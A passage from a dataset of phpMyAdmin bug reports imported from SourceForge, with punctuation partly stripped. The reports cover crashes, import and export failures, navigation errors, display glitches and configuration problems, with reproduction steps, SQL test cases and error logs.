Removing the default value, moving around and setting it back afterwards is a workaround.
Please review your whole column moving code.
I assume the bugs are even more general than what I figured out.
Original URL https sourceforge.net p phpmyadmin bugs 4089 Original author fst123 Found in version 4.0.6","bug"
"24444","10246","Runs out of memory when changing fields.
I have a table with about half a million records using about 250M on disk, and this is just a small dev database I have much bigger ones in production.
If I click change next to any field in this table or others of a similar size), phpmailer crashes with an out of memory error.
I ve tried it with a PHP memory limit of 1Gb, but it still happens.
It looks like it s trying to do something dumb like read the entire table into an array to figure out what to display for the field editor page.
It works fine for smaller tables.
I attach an example screen shot.
Adminer has no problem doing the same thing.
I m running latest from git 4.0beta2) on PHP 5.4.12 on OS X.
Original URL https sourceforge.net p phpmyadmin bugs 3856 Original author coolbru Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3856 attachment Screen 20Shot 202013 03 24 20at 2010.28.57.png","bug"
"24444","10247","Missing error message when adding an existing column.
Original URL https sourceforge.net p phpmyadmin bugs 3857 Original author lem9 Found in version Latest Git","bug"
"24444","10248","Incomplete error message when creating a foreign key constraint.
Let s say you are creating a FK constraint but the constraint fails.
Version 3.5.x would display this kind of message MySQL said 1452 Cannot add or update a child row a foreign key constraint fails but 4.0 only says Error .
Original URL https sourceforge.net p phpmyadmin bugs 3858 Original author lem9 Found in version Latest Git","bug"
"24444","10249","HTTP 404 error with config auth and Internet Explorer.
Hello, I have a little bug for many years with PhpMyAdmin and Internet Explorer browsers.
I have now decided to open a ticket!
When I start a new PMA session, I obtain an HTTP 404 error in both frames.
I have to refresh the page with F5 to display the PMA homepage and after all functions very well.
I do not see anymore a 404 error.
If I close the browser window or tab and retry to access PMA, same 404 error.
I have to refresh once .
When I obtain the 404 error, a right click on the properties of the frames shows me LEFT http domain.com left.php?server=1 db=database table= lang=fr utf 8 collation connection=utf8 general ci RIGHT http domain.com db details structure.php?server=1 db=database table= lang=fr utf 8 collation connection=utf8 general ci After the refresh, the pages well loaded are LEFT http domain.com navigation.php?token=session ID....
RIGHT http domain.com main.php?token=session ID....
Same problem with IE10, IE9, IE7 etc.
Windows 7, Vista, XP etc.
On the server side, it was Windows Server 2003 IIS 6.0.
I thought, it was the problem, but upgrading recently to Windows Server 2012 and IIS 8.0 doesn t resolve the problem.
PHP 5.4 MySQL 5.5 mysqli extension) Populating the cfg[ PmaAbsoluteUri ] variable doesn t solve the bug.
I use the config authentication type.
No problem with cookie auth method.
Problem observed with PMA 3.5.7 and hundreds of previous versions.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 3859 Original author julientld Found in version 3.5.7","bug"
"24444","10250","Displayed git revision info is not set.
On the PHPMyAdmin home page after logging in, it shows the git revision branch, date and user, but they are not set after I ve checked out the code from git.
Screen shot attached.
Original URL https sourceforge.net p phpmyadmin bugs 3860 Original author coolbru Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3860 attachment Screen 20Shot 202013 03 26 20at 2011.48.24.png","bug"
"24444","10251","horizontal scrollbar should not overflow on the left column.
When displaying a large table, the horizontal scrollbar takes the full page width.
it should only be on the sqlqueryresults element as it s the only part scrolling besides, when the horizontal scrollbar is not in its initial position, resizing the navigation panel is buggy Original URL https sourceforge.net p phpmyadmin bugs 4096 Original author mathroc Found in version 4.0.6","bug"
"24444","10252","Javascript will cause phpmyadmin can not be used.
JavaScript will cause phpmyadmin can not be used we can not create table, because the form could not be display correct.
my environment PHP 5.4.13 MySQL 5.5.30 nginx Original URL https sourceforge.net p phpmyadmin bugs 3862 Original author zhifenghu Found in version 3.5.7","bug"
"24444","10253","The column name name is a MySQL reserved keyword.. Hi, i tested the 4.0.0 beta2, went into a view browse of a table and got this notice under the tabed navigation The column name name is a MySQL reserved keyword.
I checked http dev.mysql.com doc refman 5.6 en reserved words.html and the earlyer versions.
name is not in the list of reserved words Original URL https sourceforge.net p phpmyadmin bugs 3863 Original author seipsnet Found in version 4.0.0","bug"
"24444","10254","Clicking on upper most navigation link named Server localhost generates Error code 500 .
Clicking on the upper most navigation link named in my instance) Server localhost generates a Error code 500 .
The Apache error log contains PHP Fatal error Call to undefined function PMA no cache header ) in <...snip...> libraries header http.inc.php on line 32, referer https <...snip...> index.php?token=de56afe74ed8aae60575f71df554cc6d Performing a grep i R n PMA no cache header in the root of the source code for phpMyAdmin 4.0.7 returns one 1) hit libraries header http.inc.php 32 PMA no cache header ); Commenting out the call to the function PMA no cache header ); in libraries header http.inc.php and then reloading page clicking on the upper most navigation link Server localhost creates a different error in error log PHP Fatal error Call to undefined function PMA checkParameters ) in <...snip...> libraries server links.inc.php on line 17, referer https <...snip...> db structure.php?db=someexistingdatabase table= server=1 target= token=de56afe74ed8aae60575f71df554cc6d I am uncertain how to repair the navigation link.
This is on CentOS 5.9 x86 64, PHP 5.3.3 13, MySQL 5.0.95 5 Original URL https sourceforge.net p phpmyadmin bugs 4106 Original author worsco Found in version 4.0.7","bug"
"24444","10255","bug 4046 patch causes issue with mod deflate detection.
The patch provided at https github.com phpmyadmin phpmyadmin commit 5298602f8edb4475fce5d299532c7780e0e314a5.patch, and merged in 4.0.6, causes mod deflate enabled servers to double gzip compress the exports again.
Commenting out the following in export.php returns single compression behavior.
define PMA BYPASS GET INSTANCE , 1); Tested 4.0.5 with patch applied at server 4.0.6 first upstream merged release 4.0.7 upstream merged release Resolution Add deflate detection when PMA Responce getInstance ) is bypassed, if possible.
Original URL https sourceforge.net p phpmyadmin bugs 4107 Original author keithsecond Found in version 4.0.6","bug"
"24444","10256","PMA db option can t be altered.
In the config file you can specify the database for extra features pmadb).
When this option is set to anything else than cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; an error shows below the local phpmyadmin homepage.
Message The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
To find out why click here.
However, the alternative database has the same contents, created by examples create tables.sql.
None of the tables extra options are recognized in the http localhost phpmyadmin chk rel.php?token= link.
The alternative pmadb database is OK .
Please review.
Original URL https sourceforge.net p phpmyadmin bugs 3864 Original author vandeweijgaert Found in version 3.5.7","bug"
"24444","10257","Using like operator on each backslash needs 4 backslash protection.
search using operator LIKE on backslash needs \\ protection.
Phpmyadmin does only \ Test case CREATE TABLE `mytab` `id` int 11) NOT NULL AUTO INCREMENT, `caption` varchar 255) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; INSERT INTO `zzzz`.`mytab` `id` , `caption` ) VALUES NULL , .
\.
); Try to recover this line using search menu and LIKE .... option will not enough protected backslash Original URL https sourceforge.net p phpmyadmin bugs 3865 Original author chezbas Found in version 3.5.7 Attachment http sourceforge.net p phpmyadmin bugs 3865 attachment search.png","bug"
"24444","10258","Count ) on information scheme.INNODB BUFFER PAGE with a huge bufferpool.
When using phpmyadmin to look at the information scheme database, phpmyadmin will try to do a count ) on all the tables.
For most tables this is OK, but if you have a large databaseserver with, for example, a 200GB innodb pool, than doing a count ) on information schema.INNODB BUFFER PAGE will slow down your server considerably and make it barely usable for half an hour and you are unable to kill the query until it has comleted the count) Query time 1883.320497 Lock time 0.000028 Rows sent 0 Rows examined 0 SELECT COUNT ) FROM `information schema`.`INNODB BUFFER PAGE`; I think phpmyadmin should be a bit more careful using count ) in the information scheme database if the server has a large bufferpool.
Original URL https sourceforge.net p phpmyadmin bugs 3869 Original author keeshoekzema Found in version 4.0.0","bug"
"24444","10259","Error reporting uses PHP 5.4 features.
The error reporting uses json encode flags which were introduced in 5.4.0.
There needs to be some compatibility with older PHP versions as well.
Original URL https sourceforge.net p phpmyadmin bugs 4113 Original author nijel Found in version Latest Git","bug"
"24444","10260","Missing pagination on Databases panel.
On the Databases panel, if you have more than MaxDbList databases, the pagination is missing.
Original URL https sourceforge.net p phpmyadmin bugs 3870 Original author lem9 Found in version Latest Git","bug"
"24444","10261","check referential integrity broken across databases.
When configuring relations between tables using the phpMyAdmin relation feature, and these tables are in different databases, phpMyAdmin creates broken SELECT query in Operations > Check referential integrity it completely ignores `foreign db` set in relation configuration.
As a result, MySQL complains Table table2.field2 doesn t exist .
The query should refer to it as database2.table2.field2 as table2.field2 is not present in current database.
Original URL https sourceforge.net p phpmyadmin bugs 3871 Original author ci dev Found in version 3.5.8","bug"
"24444","10262","CSP blocks map tiles in GIS data visualization.
Steps to reproduce Go to opengis.world cities table in the demo site Click Visualize GIS data from query results section Tick Use OpenStreetMaps as base layer Map tiles are not loaded due to the CSP directive.
CSP related errors can be seen on the console.
Original URL https sourceforge.net p phpmyadmin bugs 3872 Original author madhuracj Found in version 4.0.0","bug"
"24444","10263","Can t copy table to target database if table exists there.
Steps 1.
Open a table, switch to Operations tab.
2.
In the Copy table to box, check Structure and data and Add DROP TABLE .
3.
Select a target database that already contains a table with the same name.
Expected Table is dropped and then copied.
Actual Error tells that table already exists.
Original URL https sourceforge.net p phpmyadmin bugs 3873 Original author mynetx Found in version 4.0.0","bug"
"24444","10264","SSL redirects to port 80. this bug is still here for version 3.5.8, version 4.0.7, and version 4.1.0 alpha The login redirect to port 80 for https bug still exists.
Situation Login page where you input username and password https www.xxyyzz.com pma index.php after trying to login by entering username and password and click Go , it will be redirected to https www.xxyyzz.com 80 pma index.php?token=35f452d16e0c197811a4c6fd8ac04083 as you can see the domain suddenly have a 80 attached) and the page shows a SSL connection error Original URL https sourceforge.net p phpmyadmin bugs 4120 Original author calvincc Found in version 4.1.0","bug"
"24444","10265","No preselected option when exporting table.
Steps 1.
Open a table, switch to Export tab.
2.
Select Custom export.
Expected In the Rows section, Dump all rows is preselected.
Actual Both option buttons are empty.
Original URL https sourceforge.net p phpmyadmin bugs 3874 Original author mynetx Found in version 4.0.0","bug"
"24444","10266","Lost location hash and token on table add field.
Steps 1.
Open a table, switch to Structure tab.
2.
In the Add columns section, enter a number of rows > 1, click Go .
3.
Fill in some demo names for the columns, click Save .
Expected Fields are added via AJAX, top navbar works as usual.
Actual Fields are added via legacy form submit, top navbar is then broken.
Token is lost URL is set to tbl addfield.php with no query string).
Original URL https sourceforge.net p phpmyadmin bugs 3875 Original author mynetx Found in version 4.0.0","bug"
"24444","10267","PHP 5.2 unexpected T PAAMAYIM NEKUDOTAYIM.
phpMyAdmin 4.0.0 rc1 PHP 5.2.17 Parse error syntax error, unexpected T PAAMAYIM NEKUDOTAYIM, expecting , or ; in C \server\www\phpMyAdmin\libraries\display import.lib.php on line 171 the line is echo SESSION[ SESSION KEY][ handler ] getIdKey ); Original URL https sourceforge.net p phpmyadmin bugs 3876 Original author neweracracker Found in version 4.0.0","bug"
"24444","10268","Big file session > PHP Fatal error Allowed memory size.
Session file grows with each page refresh.
After some time in the php error log can be seen [16 Apr 2013 11 00 45 UTC] PHP Fatal error Allowed memory size of 134217728 bytes exhausted tried to allocate 13160160 bytes) in var www dev root www index.php on line 16 [16 Apr 2013 11 00 45 UTC] PHP Stack trace [16 Apr 2013 11 00 45 UTC] PHP 1.
{main} ) var www dev root www index.php 0 [16 Apr 2013 11 00 45 UTC] PHP 2. session write close ) var www dev root www index.php 16 https dl.dropboxusercontent.com u 59491914 sanasol cachegrind.out.21745 https dl.dropboxusercontent.com u 59491914 sanasol cachegrind.out.21753 And session file https dl.dropboxusercontent.com u 59491914 sanasol sess 8isntcgpfbsijd30vh3v2bhcglu6npgt Original URL https sourceforge.net p phpmyadmin bugs 3877 Original author poiuty Found in version 3.5.8","bug"
"24444","10269","Import broken for CSV using LOAD DATA in 4.0.0rc2.
I have a table of a database open.
I select the Import tab.
I set Format to CSV using LOAD DATA.
I select a file to be imported.
On clicking Go, phpMyAdmin shows a blank window and never returns.
The data is not imported.
I have modified the standard CSV file settings in config.inc.php to use tab delimited files.
I attach below a copy of my config.inc.php, a csv file test.txt a short version of the database in question The problem is shown on trying to import file test.txt into table fieldnumbers .
If it matters, I am using Google Chrome on a Mac.
Original URL https sourceforge.net p phpmyadmin bugs 3879 Original author ralphatcardiff Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3879 attachment Files 20for 20bug.zip","bug"
"24444","10270","Import says you can resume, but then it does not work.
I imported a large files about 214 MB).
After a while processing, I got a message reading something like Import failed because the maximum script time has been reached.
If you are importing a big file, submit the same file again and import will resume .
I m citing by memory).
I did as instructed imported the very same file again, but import immediately failed with the message cannot create database xxxxx database already exists this is a database that did not exist previous to the import and that was contained in the file being imported).
So, either resume is supposed to be supported, in which case it s broken, or it is not, in which case the error message when the script execution time shouldn t lie promising you can reupload the same file and have the import resumed.
Original URL https sourceforge.net p phpmyadmin bugs 4130 Original author sistisette Found in version 4.0.4","bug"
"24444","10271","Fatal error Nesting level too deep.
Hi, I get a fatal error after login with 4.0.0 RC1 and 4.0.0 RC2.
Fatal error Nesting level too deep recursive dependency?
in home sites phpmy web libraries navigation Nodes Node.class.php on line 287 PhpMyAdmin works correctly with version 3.5.8 My Config Apache 2.2.4 PHP 5.2.2 MySql 5.0.41 Original URL https sourceforge.net p phpmyadmin bugs 3880 Original author tucsale Found in version 4.0.0","bug"
"24444","10272","Pagination issue with the collapsible folder tree style display of database list in left panel.
Import a file that creates a few databases.
At least if the import files with an error after succesfully creating some of the databases, then the database list tree on the left panel is not completely updated.
There are databases that have been created and don t show up there.
And what is worse, that list is never updated any more.
If you go to the Databases tab, the list of databases displayed in the body of the page is complete and up to date, but still the one on the left panel is incomplete.
There s no refresh button or anything easy to find that will force it to refresh, besides the fact that you should never need that.
Original URL https sourceforge.net p phpmyadmin bugs 4132 Original author sistisette Found in version 4.0.4","bug"
"24444","10273","Escaped html in error message.
Escaped html in error message.
I guess from PMA fatalError ) I had a session go idle while on the result page of a query.
The error popup div came when I clicked a link to let me know that I had to login again.
I logged in Error index.php Missing parameter import type<a href= .
url.php?url=http 3A 2F 2F... Possible resolutions redirect to some other page, on such errors prevent escaping the html in this case Original URL https sourceforge.net p phpmyadmin bugs 3881 Original author helmo Found in version 4.0.0","bug"
"24444","10274","Ajax navigation not working with IS enabled only on first click).
Config cfg[ Servers ][ i][ DisableIS ] = false; Clicking image) leads to no tables being shown at all, cause of badly formatted query SELECT `TABLE NAME` AS `name` FROM `INFORMATION SCHEMA`.`TABLES` WHERE `TABLE SCHEMA`= wpswitch AND `TABLE TYPE`= BASE TABLE ORDER BY `TABLE NAME` ASC LIMIT , 25 ) see missing offset.
It s because pos variable isn t casted to int.
Original URL https sourceforge.net p phpmyadmin bugs 3884 Original author fliespl Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3884 attachment 1.jpg","bug"
"24444","10275","display binary as hex option causes unexpected behavior.
A while ago my colleague submitted a patch that introduced the `display binary as hex` option.
The patch was accepted by the PhpMyAdmin dev team.
It seems though that at some point changes have been made to the source code that introduce a bug that causes binary values to not be displayed correctly.
Current source found in DisplayResults.class.php line 3900 4.0.0) if SESSION[ tmp user values ][ display binary as hex ] PMA Util containsNonPrintableAscii column) ) { column = bin2hex column); } else { column = htmlspecialchars PMA Util replaceBinaryContents column ) ); } The origional version never included the added `PMA Util containsNonPrintableAscii column)` check.
If the user enabled the display binary as hex option than you NEVER want to show the binary data anyways just because it s supposed to be printable).
But it gets even worse.
It turns out about 10 of my UUID s pass the `PMA Util containsNonPrintableAscii column)` check.
But when this UUID is passed to the `htmlspecialchars` function all the data gets deleted because the function is unable to convert the binary data to HTML special chars.
I have 2 propositions 1.
If the user has the `display binary as hex` option set, then ALWAYS display the value as is 2.
If the option is disabled than use PHP s latest `htmlspecialchars` update to show the non printable characters as block as described in [this][1] article.
for some reason a list cannot be followed by code on sourceforge if SESSION[ tmp user values ][ display binary as hex ]) { column = bin2hex column); } else { column = htmlspecialchars PMA Util replaceBinaryContents column, ENT SUBSTITUTE Only works in PHP 5.4 ) ); } Note We believe a plausible reason for the introduction of this bug is that htmlspecialchars behavior has changed.
I cannot find any evidence for this but we believe the origional behavior ignored invalid characters.
[1] [http nikic.github.io 2012 01 28 htmlspecialchars improvements in PHP 5 4.html Original URL https sourceforge.net p phpmyadmin bugs 3885 Original author timmfennis Found in version 4.0.0","bug"
"24444","10276","Documentation links broken in setup.
All the documentation links inside setup are malformed.
Original URL https sourceforge.net p phpmyadmin bugs 3886 Original author kasunchathu Found in version 4.0.0","bug"
"24444","10277","User Overview Page not available to users with no select Privilege.
User s who do not have select privilege cannot visit User Overview Page server privileges.php).
example Create a new User and give him all the privileges except SELECT Now Login as the new user, USERS tab in the top menu) is missing and thus there is no access to USER Overview page So if a user who has just been granted with the right of CREATE USER privilege can t actually access the overview page and hence cannot create new user.
Cause from menu.class.php, tabs of users is defined only for superuser; and superuser is the user who can query select count ) from mysql.user .
So the person who doesn t has the select privilege can t actually query and hence cannot view USERS tab.
Original URL https sourceforge.net p phpmyadmin bugs 3887 Original author ayusun Found in version 4.0.0","bug"
"24444","10278","title attribute displayed before other html text on SQL query page.
So, here is the problem !
[title attribute misplaced] http s22.postimg.org 8fai1k95t phpmyadmin.png) To reproduce this bug 1) Browse any table 2) Open the SQL query tab from there The `title= ` is displayed as many times as there are columns in the table.
Here is what the code looks like in file libraries sql query form.lib.php from line 285 php foreach fields list as field) { html .= <option value= .
PMA Util backquote htmlspecialchars field[ Field ])) .
; if isset field[ Field ]) strlen field[ Field ]) isset field[ Comment ]) ) { echo title= .
htmlspecialchars field[ Comment ]) .
; } html .= > .
htmlspecialchars field[ Field ]) .
< option> .
\n ; } Notice that the line php echo title= .
htmlspecialchars field[ Comment ]) .
; displays the title attribute for the option element before any other html is displayed What the code should look like php html .= title= .
htmlspecialchars field[ Comment ]) .
; to ensure that the title attribute is displayed properly Just a minor fix.
Original URL https sourceforge.net p phpmyadmin bugs 3888 Original author abhikandoi2000 Found in version Latest Git","bug"
"24444","10279","When login fails and error display is active, login data is displayed.
Hide hosts, usernames and passwords when displaying calls to connect functions in the backtrace.
Otherwise sensitive login data may get exposed to people connecting to PMA after the configured MySQL server goes back online after being offline.
Minor, as backtraces are hidden per default.
Original URL https sourceforge.net p phpmyadmin bugs 3889 Original author mynetx Found in version 4.1.5","bug"
"24444","10280","Wrong page is shown after editing.
Not sure if this is related to 4134, but when I m browsing a table with multiple pages), then select several rows to edit and save, it jumps to a different page.
If I m on page 1 it jumps to page 2, if I m on page 2 or 3 it jumps back to page 1.
Also, if I click the edit button next to one row, it goes to edit that row in a full page , but when editing multiple rows it opens a JavaScript modal like window over the current page.
This seems counter intuitive to me, as editing more rows requires more space rather than cramming into a small window.
Now that the whole app is AJAX based I wonder if we even need the modal window thing?
Just do what s already done for single rows.
Original URL https sourceforge.net p phpmyadmin bugs 4141 Original author svivian Found in version 4.0.8","bug"
"24444","10281","Importing from web server upload directory fails.
When trying to import a dump file from the web server upload directory, the file is not imported, but an error is shown.
Steps to reproduce 1.
Create a folder upload in the phpMyAdmin root directory.
2.
Add an SQL dump file to the new folder.
3.
Add the following line to your config.inc.php file .
4.
Open a database, and switch to the Import tab.
5.
Mark the option Select from the web server upload directory .
6.
Open the drop down, and pick the file added in step 2.
7.
At the bottom, click the Go button.
Expected result The file is imported, and a success message is displayed afterwards.
Actual result The following error message is shown, and the import is canceled > No data was received to import.
Either no file name was submitted, > or the file size exceeded the maximum size permitted by your PHP > configuration.
See FAQ 1.16.
Original URL https sourceforge.net p phpmyadmin bugs 3890 Original author mynetx Found in version 4.0.0","bug"
"24444","10282","Server upload folder import file name missing in success message.
When importing a file from server upload folder, the file name is not displayed in the import success message.
Original URL https sourceforge.net p phpmyadmin bugs 3891 Original author mynetx Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3891 attachment import brackets.jpg","bug"
"24444","10283","SQL Export files are empty.
When exporting a database, the generated SQL file is empty.
Only the phpMyAdmin comment headers and database collaction SET commands are written.
When exporting a database without writing a file, the following error is displayed > No tables found in database.
Reproduced on demo.phpmyadmin.net running running Git revision RELEASE 4 0 0RC3 59 g658c79e from QA 4 0 branch.
Original URL https sourceforge.net p phpmyadmin bugs 3892 Original author mynetx Found in version 4.0.0","bug"
"24444","10284","Token mismatch error on every action.
I m getting token mismatch on every link I click, and I can get only to the main menu screen, nothing else is working.
I attach image where you can see the bug and the version of php, mysql and phpMyAdmin I m using.
Also I m Windows 7 and using xampp 1.8.1 and Chrome 26.0.1410.64 .
Also here is the config file I build it with the setup option Servers configuration i = 0; Server 127.0.0.1 [1] i ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ host ] = 127.0.0.1 ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ nopassword ] = true; cfg[ Servers ][ i][ auth type ] = http ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = ; cfg[ Servers ][ i][ AllowNoPassword ] = true; cfg[ Servers ][ i][ CountTables ] = true; End of servers configuration cfg[ DefaultLang ] = en ; cfg[ ServerDefault ] = 1; cfg[ UploadDir ] = ; cfg[ SaveDir ] = ; cfg[ AllowArbitraryServer ] = true; cfg[ UserprefsDeveloperTab ] = true; cfg[ Error Handler ][ display ] = true; Original URL https sourceforge.net p phpmyadmin bugs 3893 Original author pbojan Found in version 4.1.6 Attachment http sourceforge.net p phpmyadmin bugs 3893 attachment 127.0.0.1 20 20 20127.0.0.1 20 20 20phpMyAdmin 204.0.0 20rc4.png","bug"
"24444","10285","Browse mode grid has disabled scrollbars.
Related to fix for https sourceforge.net p phpmyadmin bugs 4096 .
Seen in multiple browsers, see attachment.
commit e72342f10aad4f4f5e9695ce16589f1c9688cae9 Author suheb <suhebjerk gmail.com> Date Thu Nov 14 22 23 05 2013 0530 bug fix 4096 diff git a themes pmahomme css common.css.php b themes pmahomme css common.css index e9b8b0b..2fd9f0e 100644 a themes pmahomme css common.css.php b themes pmahomme css common.css.php 81,6 81,7 h2 a img { .data, .data full width { margin 0 0 12px; overflow scroll; } .data full width { Original URL https sourceforge.net p phpmyadmin bugs 4156 Original author mynetx Found in version Latest Git snapshot Attachment http sourceforge.net p phpmyadmin bugs 4156 attachment Screenshot 202013 11 19 2016.17.23.jpg","bug"
"24444","10286","Provide feedback if no columns selected for multi submit.
When you edit the table structure and click the multi submit button for editing, there should be an indication that your request failed due to no columns selected.
Original URL https sourceforge.net p phpmyadmin bugs 3894 Original author mynetx Found in version Next minor version","bug"
"24444","10287","Multiple errors trying to vew BLOB data.
Hi, The error messages are tbl get field.php Missing parameter where clause tbl get field.php Missing parameter transform key To reproduce Create a table with an autoincrementing id and a longblob picture , upload an image to picture , go to the Browse tab and click on the text similar to [BLOB 1.9 MiB] .
The error text appears as an AJAX dialog.
According to my attempt at git bisect, the error message is a recent change but the expected behaviour has been silently broken since [db22f56fd2584508bc77cb03922020183ac8bb49] Document MaxRows behavior when a LIMIT clause is present...but that commit doesn t look suspicious at all, so I seem to have had some glitch when bisecting.
At the very least I can at least report that QA 3 5 does not generate the error it does want to download the .jpg as a .bin file instead, but I did not investigate that further); current master d359426f536303aa303d7bfcfbdbf430b2f87b97 gives the error message.
Original URL https sourceforge.net p phpmyadmin bugs 3895 Original author ibennetch Found in version Latest Git","bug"
"24444","10288","Data export for tables with name in uppercase broken.
Data export is broken for tables which contain uppercase letters in their names.
Every time I try to export data from such tables, I get message Error reading data 1146 Table exampledb.exampletable doesn t exist) You can get this message when you try to export data rows from table named ExampleTable.
For some strange reason it inserts table name in lowercase in sql when it tries to retrieve given rows.
Original URL https sourceforge.net p phpmyadmin bugs 3896 Original author sergbass Found in version 3.5.8","bug"
"24444","10289","Row Statistics and Space usage Bugs.
1. usage in Space usage doesn t start with a capitcal 2.
The Row length value doesn t have a unit B?)
3.
The alternating row color is messed up Original URL https sourceforge.net p phpmyadmin bugs 3897 Original author olafvdspek Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3897 attachment pma.PNG","bug"
"24444","10290","Structure not refreshed after column drop.
After you remove a field, the structure page isn t properly refreshed misuse of AJAX?).
The Space Usage and Row Stats tables aren t updated.
Original URL https sourceforge.net p phpmyadmin bugs 3898 Original author olafvdspek Found in version 4.0.0","bug"
"24444","10291","Hide and Show hidden items are not translatable.
These are in the navigation panel.
Original URL https sourceforge.net p phpmyadmin bugs 4164 Original author lem9 Found in version 4.1.0","bug"
"24444","10292","CSP WARN in Firefox console.
The Firefox console shows the following error > CSP WARN allow directive is deprecated, use the equivalent default source directive instead Original URL https sourceforge.net p phpmyadmin bugs 3900 Original author mynetx Found in version 4.0.0","bug"
"24444","10293","unsigned integer is not used for input limit on line copy.
1. create a table with a tiny int and unsigned property.
create a row with a value auf 240 copy that row try to save it, now a popup comes up telling you that the max value is 127 Original URL https sourceforge.net p phpmyadmin bugs 4165 Original author lord rod Found in version 4.1.0","bug"
"24444","10294","Setup script warning for config auth stored login data) shows link BBcode.
In the setup script, when editing a config auth server, in the warning message, you see the following > Set [a ?page=servers mode=edit id=1 tab Server]authentication type to cookie or http.
If you feel this is necessary, use additional protection settings [a ?page=servers mode=edit id=1 tab Server config]host authentication settings and trusted proxies list.
There should be links shown instead of the BBcode.
Original URL https sourceforge.net p phpmyadmin bugs 3901 Original author mynetx Found in version 4.0.0","bug"
"24444","10295","Cannot browse when table name contains keyword call .
There is no contents shown in the Browse tab, just the Bookmark box.
Import this table Table structure for table `mpapi apicalls` CREATE TABLE IF NOT EXISTS `mpapi apicalls` `id` int 1) NOT NULL AUTO INCREMENT, `called` datetime NOT NULL, `query` text NOT NULL, `reply` text NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=2 ; Dumping data for table `mpapi apicalls` INSERT INTO `mpapi apicalls` `id`, `called`, `query`, `reply`) VALUES 1, 2013 05 01 00 00 00 , test , test ); Open the table s Browse tab, and get this developer mode) error > Notice in .\sql.php 1086 > Undefined variable sql data > > > > Warning in .\sql.php 1280 > implode ) Invalid arguments passed > > Backtrace > > .\sql.php 1280 implode > string ;, > NULL, > ) > .\sql.php 1088 getTableHtmlForMultipleQueries > object, > string test1, > NULL, > string tbl structure.php, > string .
themes pmahomme img , > string ltr, > NULL, > string db=test1 amp;table=mpapi apicalls amp;token=6a2435c059f342752fc89cb09955db74 amp;goto=tbl sql.php amp;back=tbl sql.php, > string urdr111101, > string LIMIT 0, 30 , > ) > > > > Warning in .\libraries\dbi\mysqli.dbi.lib.php 587 > mysqli fetch fields ) expects parameter 1 to be mysqli result, boolean given > > Backtrace > > .\libraries\dbi\mysqli.dbi.lib.php 587 mysqli fetch fields boolean ) > .\sql.php 1297 PMA DBI get fields meta boolean ) > .\sql.php 1088 getTableHtmlForMultipleQueries > object, > string test1, > NULL, > string tbl structure.php, > string .
themes pmahomme img , > string ltr, > NULL, > string db=test1 amp;table=mpapi apicalls amp;token=6a2435c059f342752fc89cb09955db74 amp;goto=tbl sql.php amp;back=tbl sql.php, > string urdr111101, > string LIMIT 0, 30 , > ) > > > > Runtime Notice in .\libraries\dbi\mysqli.dbi.lib.php 367 > mysqli next result ) There is no next result set.
Please, call mysqli more results ) mysqli more results ) to check whether to call this function method > > Backtrace > > .\libraries\dbi\mysqli.dbi.lib.php 367 mysqli next result object) > .\sql.php 1370 PMA DBI next result ) > .\sql.php 1088 getTableHtmlForMultipleQueries > object, > string test1, > NULL, > string tbl structure.php, > string .
themes pmahomme img , > string ltr, > NULL, > string db=test1 amp;table=mpapi apicalls amp;token=6a2435c059f342752fc89cb09955db74 amp;goto=tbl sql.php amp;back=tbl sql.php, > string urdr111101, > string LIMIT 0, 30 , > )> 9f1f8d6c75c4f4332f5e78ffd9fc66747c2ea226 is the first bad commit commit 9f1f8d6c75c4f4332f5e78ffd9fc66747c2ea226 Author Chanaka Indrajith Date Sun Jul 22 16 22 49 2012 0530 Support for stored procedures with multiple queries 040000 040000 d9d44cf656672310de0e5c9196dbfaf768f5b772 04de70c1cb270a1cf90455bb 176d02c17100f53a M libraries 100644 100644 27df11e36b3f3c4c2ce3a6902b57e02e8c6c0aad 654f8ab96e2e0927ea5b9b4c 326cbcca18bd6c1c M sql.php Original URL https sourceforge.net p phpmyadmin bugs 3902 Original author mynetx Found in version 4.0.0","bug"
"24444","10296","Query fails when using aliases after ordering results.
3.5.8.1deb1 Apache 2.2.22 Ubuntu) Database client version libmysql 5.5.31 PHP extension mysqli Table can be reproduced on any table) CREATE TABLE `LabelValues` `labelvalue id` int 10) NOT NULL AUTO INCREMENT, `label id` int 10) unsigned NOT NULL, `object id` int 10) unsigned NOT NULL, `object type` enum RC , PT , ST , EX , CC , FI , SH ) NOT NULL, PRIMARY KEY `labelvalue id`), UNIQUE KEY `NewIndex` `object id`,`object type`,`label id`), KEY `LabelValues FKIndex1` `label id`), KEY `NewIndex3` `object type`,`object id`) ) ENGINE=InnoDB AUTO INCREMENT=4938 DEFAULT CHARSET=utf8; INSERT INTO `LabelValues` `labelvalue id`, `label id`, `object id`, `object type`) VALUES 7, 5, 1, CC ); INSERT INTO `LabelValues` `labelvalue id`, `label id`, `object id`, `object type`) VALUES 143, 2, 2, CC ); INSERT INTO `LabelValues` `labelvalue id`, `label id`, `object id`, `object type`) VALUES 144, 2, 3, CC ); INSERT INTO `LabelValues` `labelvalue id`, `label id`, `object id`, `object type`) VALUES 3, 4, 4, CC ); Reproduction First go to Browse and order results by object id.
then write your own query with alias SELECT FROM `LabelValues` AS `alias`; causes error 1054 Unknown column LabelValues.object id in order clause phpmyadmin really runs query like this SELECT FROM `LabelValues` AS `alias` ORDER BY `LabelValues`.`object id` ASC LIMIT 0 , 30 Original URL https sourceforge.net p phpmyadmin bugs 3903 Original author sklmed Found in version 4.1.0","bug"
"24444","10297","Browsing an empty table should not display its Structure.
